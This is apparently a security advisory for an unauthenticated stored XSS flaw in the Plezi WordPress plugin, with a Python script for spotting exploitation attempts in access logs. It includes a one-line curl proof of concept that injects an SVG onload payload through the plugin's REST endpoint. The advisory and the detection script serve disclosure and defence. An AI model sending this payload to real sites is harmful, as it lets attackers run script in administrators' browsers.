Plezi < 1.0.3 - Unauthenticated Stored XSS
Description
The plugin has a REST endpoint that allows unauthenticated users to update the plz_configuration_tracker_enable option. The option value is then displayed in the admin panel without sanitisation or escaping, leading to a Stored Cross-Site Scripting issue.
Proof of Concept
curl -X POST 'https://example.com/wp-json/plz/v2/configuration/update-tracker?switchstatus="><svg/onload=alert(`XSS`)>'
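A log check for the endpoint described above, as an added example that is not part of the original README or the plugin's code: it flags access-log requests to the route, including the `?rest_route=` form WordPress accepts when pretty permalinks are off. The Combined Log Format, the benign-value pattern, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Route, namespace and parameter name are taken from the advisory above.
ROUTE = "/plz/v2/configuration/update-tracker"
PARAM = "switchstatus"
# Assumption: a legitimate toggle value is a short alphanumeric token.
BENIGN = re.compile(r"[A-Za-z0-9_-]{1,16}")
# Assumption: Combined Log Format, ip - user [time] "METHOD target PROTO" status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-json/plz/v2/configuration/update-tracker?switchstatus=%22%3E%3Cb%3E HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Jan/2024:10:05:00 +0000] "POST /wp-json/plz/v2/configuration/update-tracker?switchstatus=1 HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Jan/2024:10:09:00 +0000] "POST /index.php?rest_route=/plz/v2/configuration/update-tracker&switchstatus=%3Cb%3E HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Jan/2024:10:10:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 512',
]


def targets_route(target):
    """True if the request reaches the route via /wp-json/ or ?rest_route=."""
    parts = urlsplit(target)
    if unquote(parts.path).rstrip("/").endswith("/wp-json" + ROUTE):
        return True
    rest_route = parse_qs(parts.query).get("rest_route", [""])[0]
    return rest_route.rstrip("/") == ROUTE


def inspect(line):
    """Return a finding for a log line that hits the route, else None."""
    m = LINE.match(line)
    if not m or not targets_route(m.group(4)):
        return None
    ip, when, method, target, status = m.groups()
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(PARAM, [])
    # Any value outside the benign pattern (markup, quotes, escapes) is flagged.
    return {"ip": ip, "time": when, "method": method, "status": int(status),
            "values": values, "suspicious": any(not BENIGN.fullmatch(v) for v in values)}


def scan(lines):
    """Collect findings for every line that targets the route."""
    return [f for f in map(inspect, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Parameters sent in a POST body do not appear in access logs, so every unauthenticated hit on the route is worth reviewing, not only the flagged ones.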
References
https://wpscan.com/vulnerability/7cede02e-9af7-4f50-95a8-84ef4c7f7ded